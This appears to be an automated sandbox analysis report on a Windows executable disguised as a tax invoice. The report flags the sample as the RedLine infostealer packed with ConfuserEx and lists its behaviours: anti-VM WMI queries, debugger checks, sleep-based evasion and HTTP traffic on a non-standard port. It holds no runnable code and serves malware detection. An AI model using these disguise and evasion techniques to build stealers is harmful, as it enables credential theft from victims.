Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E3A1F2	0_2_00E3A1F2
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E38318	0_2_00E38318
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E30460	0_2_00E30460
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E34410	0_2_00E34410
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E3E928	0_2_00E3E928
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E395C9	0_2_00E395C9
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00E395D8	0_2_00E395D8
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_02DBDE10	1_2_02DBDE10
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_02DBD2F0	1_2_02DBD2F0
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_05968440	1_2_05968440

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Process Stats: CPU usage > 98%

Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: OriginalFilename vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546071087.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCoronavirus.dll8 vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.544458915.000000000047A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAeSRJ.exe\ vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000000.270608015.0000000000452000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAeSRJ.exe\ vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546495965.0000000002831000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCoronavirus.dll8 vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546495965.0000000002831000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546222961.0000000000F00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: OriginalFilename vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000000.274498408.0000000000B02000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAeSRJ.exe\ vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.452008940.000000000115A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454743140.0000000002E82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs P90GT_Invoice_Related_Property_Tax_P800.exe
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: OriginalFilenameAeSRJ.exe\ vs P90GT_Invoice_Related_Property_Tax_P800.exe

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static PE information: Section: T,y"J8 ZLIB complexity 1.00034832803

Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Virustotal: Detection: 61%
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe "C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe"
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process created: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process created: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

File created: C:\Users\user\AppData\Local\Temp\tmp8755.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/33@5/2

Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\Users\Mysterio\Documents\Visual Studio 2012\Projects\Coronavirus\Coronavirus\obj\Debug\Coronavirus.pdbBSJB source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546071087.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546495965.0000000002831000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Mysterio\Documents\Visual Studio 2012\Projects\Coronavirus\Coronavirus\obj\Debug\Coronavirus.pdb source: P90GT_Invoice_Related_Property_Tax_P800.exe, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546071087.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000000.00000002.546495965.0000000002831000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 0_2_00EE3BFF push FFFFFFC7h; ret	0_2_00EE3C01
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_0596C5B3 push es; ret	1_2_0596C5C0
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_0596A378 push esp; retf	1_2_0596A379
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_0596BCE0 pushfd ; retf	1_2_0596BCE5
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Code function: 1_2_064043B9 push eax; retf	1_2_064043BD

Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Static PE information: section name: T,y"J8
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Static PE information: section name:

Source: initial sample

Static PE information: section name: T,y"J8 entropy: 7.99896508555

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 17685
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 17685
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 17685
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 17685
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 17685 -> 49744

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: R'). ONLY 'WINDBG.EXE' OR 'CDB.EXE' ARE SUPPORTED.
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: '). ONLY 'WINDBG.EXE' OR 'CDB.EXE' ARE SUPPORTED.
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: WINDBG.EXE
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: CONFIGURATION FILE CREATED. PLEASE EDIT THE PATH TO THE DEBUGGERS (WINDBG.EXE OR CDB.EXE).
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: PLEASE EDIT THE PATH TO THE DEBUGGERS (WINDBG.EXE OR CDB.EXE).7
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: <CONFIG>: MAIN NODE. <DEBUGGER>: SUPPORTED DEBUGGERS ARE WINDBG.EXE AND CDB.EXE. EXE64: FULL PATH OF THE 64-BIT VERSION
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Binary or memory string: <DEBUGGER>: SUPPORTED DEBUGGERS ARE WINDBG.EXE AND CDB.EXE.

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe TID: 2384	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe TID: 2384	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe TID: 4532	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe TID: 6668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Window / User API: threadDelayed 6155			Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Window / User API: threadDelayed 2637			Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.419290897.000000000671D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.453143654.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmz
